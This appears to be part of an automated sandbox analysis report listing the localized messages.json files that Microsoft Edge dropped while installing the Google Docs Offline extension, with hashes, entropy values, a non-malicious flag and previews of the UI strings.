Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
